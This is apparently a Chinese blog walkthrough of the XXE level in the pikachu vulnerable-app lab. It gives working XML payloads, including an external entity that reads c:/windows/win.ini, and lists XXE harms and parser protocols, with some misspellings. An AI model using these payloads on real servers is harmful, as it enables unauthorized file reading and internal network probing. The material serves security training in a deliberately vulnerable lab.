当前位置: 首页 > article >正文

pikachu XXE(XML外部实体注入)通关

靶场:pikachu

环境:

系统:Windows10
服务器:PHPstudy2018
靶场:pikachu

关卡提示说:这是一个接收xml数据的api

常用的Payload

回显

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe "XXE" > ]> 
<foo>&xxe;</foo>

 执行结果

查看系统文件内容

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]> 
<foo>&xxe;</foo>

 执行结果

XXE的危害:

  1. 文件读取

  2. 内网主机扫描

  3. 端口探测

  4. 远程代码执行

XXE漏洞可利用的协议:

  1. ilbxml2=file/http/ftp

  2. PHP=file、http、ftp、php、compress.zlib、compress.bzip2、data、glob、phar

  3. Java=http、https、ftp、file、jar、netdoc、mailto、gophar

  4. NET=file、http、https、ftp

概述

XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。


http://www.kler.cn/news/312021.html

相关文章:

  • TCP协议分析《实验报告》
  • 第三方接口-苹果-获取天气接口
  • Flask、Werkzeug 和 WSGI 间的关系
  • 代码随想录算法训练营第三十二天 | 509. 斐波那契数,70. 爬楼梯,746. 使用最小花费爬楼梯
  • PHP 实现 redis 分布式锁
  • 中间件安全(二)
  • 作品集生成链接或二维码:设计师求职
  • 数据结构和算法之线性结构
  • Java中Integer的缓存池是怎么实现的?
  • 旧系统迁移新框架:FastAPI 的 WSGIMiddleware 让过程变得简单
  • 松材线虫无人机数据集——20731个,已人工标注出来的样本【深度学习样本】
  • 【Leetcode:2848. 与车相交的点 + 模拟计数】
  • Java | Leetcode Java题解之第413题等差数列划分
  • 最新!综合性SCI期刊汇总!《NATURE》位居榜首~
  • 大数据基础架构技术栈一览
  • Redis 的三个并发问题及解决方案(面试题)
  • 【AI大模型】ChatGPT模型原理介绍(下)
  • Redis 执行 Lua,能保证原子性吗?
  • 深入解析 JVM 中静态块、静态属性、构造块与构造方法的执行顺序
  • Vue2项目升级攻略:如何更新package.json中的依赖
  • WPF 中的线程池
  • 阿里云盘照片事件!网络安全警钟长鸣
  • 网站采用H5+CSS3开发的优势和劣势
  • postgresql-patroni高可用安装部署
  • 中国电子学会202306青少年软件编程(Python)等级考试试卷(二级)真题
  • Kubernetes调度基础
  • 二叉树的遍历【C++】
  • python批量对遥感影像进行归一化与数据清洗
  • 【Linux】—— muduo网络库的安装配置与使用
  • 第160天:安全开发-Python-蓝队项目流量攻击分析文件动态监控Webshell检测